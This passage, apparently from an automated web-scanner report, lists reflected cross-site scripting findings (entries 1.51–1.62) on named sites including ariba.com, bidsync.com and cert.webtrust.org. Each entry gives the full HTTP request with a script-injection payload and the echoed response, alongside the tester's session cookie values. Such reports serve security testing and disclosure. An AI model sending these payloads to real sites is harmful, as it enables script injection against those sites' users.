Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; s_cc=true; s_ppv=100; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.7.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=125; gpv_pn=%2Flegal%2Fen_webtrust.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Flegal%25252Fen_webtrust.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Froles%25252Fit.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:05:19 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=366;expires=Wed, 17-Oct-2012 18:05:19 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/roles/it.cfm?99487--><script>alert(1)</script>6b84c1d7b2d=1&l=dm" title="D&#228;nemark">
...[SNIP]...

1.51. http://www.ariba.com/services/support.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /services/support.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dbac"><script>alert(1)</script>03affe20636 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/support.cfm?5dbac"><script>alert(1)</script>03affe20636=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm?7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=293; s_cc=true; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.13.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=60; gpv_pn=%2Flegal%2Fen_webtrust.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Flegal%25252Fen_webtrust.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Fsupport%25252Fsupport_services.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:07:28 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=558;expires=Wed, 17-Oct-2012 18:07:28 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title> Ariba Customer Support - Technical Support</
...[SNIP]...
<a href="http://nordics.ariba.com/services/support.cfm?5dbac"><script>alert(1)</script>03affe20636=1&l=dm" title="Denmark">
...[SNIP]...

1.52. http://www.ariba.com/services/support.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /services/support.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b09fb--><script>alert(1)</script>335291e69b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/support.cfm?b09fb--><script>alert(1)</script>335291e69b=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm?7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=293; s_cc=true; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.13.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=60; gpv_pn=%2Flegal%2Fen_webtrust.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Flegal%25252Fen_webtrust.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Fsupport%25252Fsupport_services.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:07:34 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=579;expires=Wed, 17-Oct-2012 18:07:34 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title> Ariba Customer Support - Technical Support</
...[SNIP]...
<a href="http://nordics.ariba.com/services/support.cfm?b09fb--><script>alert(1)</script>335291e69b=1&l=dm" title="D&#228;nemark">
...[SNIP]...

1.53. http://www.ariba.com/services/support.cfm [x parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /services/support.cfm

Issue detail

The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99102"><script>alert(1)</script>03e1c43be50 was submitted in the x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/support.cfm?x=999102"><script>alert(1)</script>03e1c43be50 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=410; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.15.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:07:31 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=569;expires=Wed, 17-Oct-2012 18:07:31 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title> Ariba Customer Support - Technical Support</
...[SNIP]...
<a href="http://nordics.ariba.com/services/support.cfm?x=999102"><script>alert(1)</script>03e1c43be50&l=dm" title="Denmark">
...[SNIP]...

1.54. http://www.ariba.com/services/support.cfm [x parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /services/support.cfm

Issue detail

The value of the x request parameter is copied into an HTML comment. The payload fbf9c--><script>alert(1)</script>18154aa94d5 was submitted in the x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/support.cfm?x=9fbf9c--><script>alert(1)</script>18154aa94d5 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=410; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.15.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:07:36 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=582;expires=Wed, 17-Oct-2012 18:07:36 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title> Ariba Customer Support - Technical Support</
...[SNIP]...
<a href="http://nordics.ariba.com/services/support.cfm?x=9fbf9c--><script>alert(1)</script>18154aa94d5&l=dm" title="D&#228;nemark">
...[SNIP]...

1.55. http://www.ariba.com/solutions/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /solutions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 227cf"><script>alert(1)</script>374e4619cfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solutions/?227cf"><script>alert(1)</script>374e4619cfe=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=3; s_cc=true; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.2.10.1318960999; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=32; gpv_pn=%2Flegal%2Fen_webtrust.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Flegal%25252Fen_webtrust.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Fsolutions%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:04:44 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=228;expires=Wed, 17-Oct-2012 18:04:44 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title> Spend Management Software, Spend Management
...[SNIP]...
<a href="http://nordics.ariba.com/solutions/index.cfm?227cf"><script>alert(1)</script>374e4619cfe=1&l=dm" title="Denmark">
...[SNIP]...

1.56. http://www.ariba.com/solutions/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /solutions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bc027--><script>alert(1)</script>70af1c16482 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /solutions/?bc027--><script>alert(1)</script>70af1c16482=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=3; s_cc=true; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.2.10.1318960999; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=32; gpv_pn=%2Flegal%2Fen_webtrust.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Flegal%25252Fen_webtrust.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Fsolutions%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:04:48 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=252;expires=Wed, 17-Oct-2012 18:04:48 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title> Spend Management Software, Spend Management
...[SNIP]...
<a href="http://nordics.ariba.com/solutions/index.cfm?bc027--><script>alert(1)</script>70af1c16482=1&l=dm" title="D&#228;nemark">
...[SNIP]...

1.57. http://www.ariba.com/suppliermembership/index.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /suppliermembership/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae70"><script>alert(1)</script>e1491ffb028 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /suppliermembership/index.cfm?fae70"><script>alert(1)</script>e1491ffb028=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=80; s_cc=true; s_sq=%5B%5BB%5D%5D; s_ppv=100; gpv_pn=%2Flegal%2Fen_webtrust.cfm; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.7.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LANGUAGEID=en

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:04:56 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=292;expires=Wed, 17-Oct-2012 18:04:56 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/suppliermembership/index.cfm?fae70"><script>alert(1)</script>e1491ffb028=1&l=dm" title="Denmark">
...[SNIP]...

1.58. http://www.ariba.com/suppliermembership/index.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /suppliermembership/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b223b--><script>alert(1)</script>4a90bc7dcd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /suppliermembership/index.cfm?b223b--><script>alert(1)</script>4a90bc7dcd3=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=80; s_cc=true; s_sq=%5B%5BB%5D%5D; s_ppv=100; gpv_pn=%2Flegal%2Fen_webtrust.cfm; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.7.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LANGUAGEID=en

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:04:58 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=302;expires=Wed, 17-Oct-2012 18:04:58 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/suppliermembership/index.cfm?b223b--><script>alert(1)</script>4a90bc7dcd3=1&l=dm" title="D&#228;nemark">
...[SNIP]...

1.59. https://www.bidsync.com/SupplierRegister [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bidsync.com
Path:   /SupplierRegister

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ca57<img%20src%3da%20onerror%3dalert(1)>2dcc38cf48a was submitted in the REST URL parameter 1. This input was echoed as 2ca57<img src=a onerror=alert(1)>2dcc38cf48a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /2ca57<img%20src%3da%20onerror%3dalert(1)>2dcc38cf48a?ac=register&posting=true&plan=0&regtype=default&cmd=next HTTP/1.1
Host: www.bidsync.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q=reuters+supplier#q=supplier+registration&hl=en&tbo=1&prmd=imvns&ei=M6WdTpv5BKjniAK1j5HXCQ&start=10&sa=N&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=67ad93a5206fb0d0&biw=1206&bih=911
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Set-Cookie: LBCOOKIE=R327324337; path=/
Date: Tue, 18 Oct 2011 17:52:35 GMT
Server: Apache
X-Powered-By: Servlet/3.0 JSP/2.2 (GlassFish Server Open Source Edition 3.1.1 Java/Sun Microsystems Inc./1.6)
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>404 Not Found | B
...[SNIP]...
<b>/2ca57<img src=a onerror=alert(1)>2dcc38cf48a/index.html</b>
...[SNIP]...

1.60. https://www.bidsync.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bidsync.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e93ca<img%20src%3da%20onerror%3dalert(1)>e91ec3331d4 was submitted in the REST URL parameter 1. This input was echoed as e93ca<img src=a onerror=alert(1)>e91ec3331d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /e93ca<img%20src%3da%20onerror%3dalert(1)>e91ec3331d4 HTTP/1.1
Host: www.bidsync.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=829943a1e188a0077f7891b3705a; _bidlync_plan_selection=%7BSYSENC2%7D35kosVC5oG3%2FsIJnEmKe%2BQ%3D%3D44CZvS%2FT7HLGvg%2FDMZFpsnmHCl2z46qsqWL69w%2BlnC9W1dxUujHT5Uj%2BAuJvK9s%2B; LBCOOKIE=R327324337

Response

HTTP/1.1 404 Not Found
Set-Cookie: LBCOOKIE=R327324337; path=/
Date: Tue, 18 Oct 2011 17:52:37 GMT
Server: Apache
X-Powered-By: Servlet/3.0 JSP/2.2 (GlassFish Server Open Source Edition 3.1.1 Java/Sun Microsystems Inc./1.6)
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>404 Not Found | B
...[SNIP]...
<b>/e93ca<img src=a onerror=alert(1)>e91ec3331d4/index.html</b>
...[SNIP]...

1.61. https://cert.webtrust.org/ViewSeal [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /ViewSeal

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e90de<script>alert(1)</script>0554eaa8499 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /ViewSeal?id=781 HTTP/1.1
Host: cert.webtrust.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=e90de<script>alert(1)</script>0554eaa8499
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 16:36:03 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 258

<html>
<head>
<title>Web Trust</title>
<link rel="stylesheet" href="/admin.css" type="text/css">
</head>
<body>
Invalid domain [http://www.google.com/search?hl=en&q=e90de<script>alert(1)</script>0554eaa8499]: please contact your practitioner.</body>
...[SNIP]...

1.62. http://www.ariba.com/contact.cfm [CAMPID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /contact.cfm

Issue detail

